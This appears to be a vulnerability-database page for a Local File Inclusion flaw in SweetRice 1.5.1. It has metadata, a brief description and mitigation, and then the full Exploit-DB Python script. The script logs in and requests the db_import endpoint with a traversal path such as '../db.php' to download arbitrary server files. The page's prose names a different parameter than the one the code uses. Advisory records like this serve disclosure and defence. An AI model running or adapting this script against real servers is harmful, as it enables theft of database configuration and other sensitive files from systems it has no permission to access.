SweetRice 1.5.1 - Local File Inclusion

vendor:

SweetRice

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

Local File Inclusion

CWE

Product Name: SweetRice

Affected Version From: 1.5.1

Affected Version To: 1.5.1

Patch Exists: NO

Related CWE: N/A

CPE: a:basic-cms:sweetrice:1.5.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WebApp - PHP - Mysql

2016

SweetRice 1.5.1 – Local File Inclusion

SweetRice 1.5.1 is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability to gain access to sensitive files on the server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'file' parameter in the '_get_file' action of the 'plugin' parameter in the 'as' module. An attacker can send a specially crafted HTTP request containing directory traversal sequences (e.g. '../') to download arbitrary files from the server.

Mitigation:

To mitigate this vulnerability, the application should validate user-supplied input and sanitize it before using it in the application.

Source

Exploit-DB raw data:

#/usr/bin/python
#-*- Coding: utf-8 -*-
# Exploit Title: SweetRice 1.5.1 - Local File Inclusion
# Exploit Author: Ashiyane Digital Security Team
# Date: 03-11-2016
# Vendor: http://www.basic-cms.org/
# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
# Version: 1.5.1
# Platform: WebApp - PHP - Mysql

import requests
import os
from requests import session

if os.name == 'nt':
    os.system('cls')
else:
    os.system('clear')
    pass
banner = '''
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
|  _________                      __ __________.__                    |
| /   _____/_  _  __ ____   _____/  |\______   \__| ____  ____      |
| \_____  \\ \/ \/ // __ \_/ __ \   __\       _/  |/ ___\/ __ \     |
| /        \\     /\  ___/\  ___/|  | |    |   \  \  \__\  ___/     |
|/_______  / \/\_/  \___  >\___  >__| |____|_  /__|\___  >___  >    |
|        \/             \/     \/            \/        \/    \/     |                                                    
|    > SweetRice 1.5.1 Local File Inclusion                            |
|    > Script Cod3r : Ehsan Hosseini                                    |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
'''

print(banner)


# Get Host & User & Pass & LfiPath
host = input("Enter The Target URL(Example : localhost.com) : ")
username = input("Enter Username : ")
password = input("Enter Password : ")
lfipath = input("Enter File To Download(Example : ../db.php) : ")
xplfile = input("Enter Name of File To Save(Example : ../db.php) : ")

userinfo = {
    'user':username,
    'passwd':password,
    'rememberMe':''
}

with session() as r:
    login = r.post('http://' + host + '/as/?type=signin', data=userinfo)
    success = 'Login success'
    if login.status_code == 200:
        print("[+] Sending User&Pass...")
        if login.text.find(success) > 1:
            print("[+] Login Succssfully...")
        else:
            print("[-] User or Pass is incorrent...")
            print("Good Bye...")
            exit()
            pass
        pass
    dlfile = r.get('http://' + host + '/as/?type=data&mode=db_import&db_file=' + lfipath + '&form_mode=save')

    if dlfile.status_code == 200:

        print('[+] Exploit...')
        file = open(xplfile, "w")
        file.write(dlfile.text)
        file.close()
        print('[+] File Saved...')
        print('[+] Exploit By Ehsan Hosseini')
    else:
        print("[-] Error in Exploting...")
        pass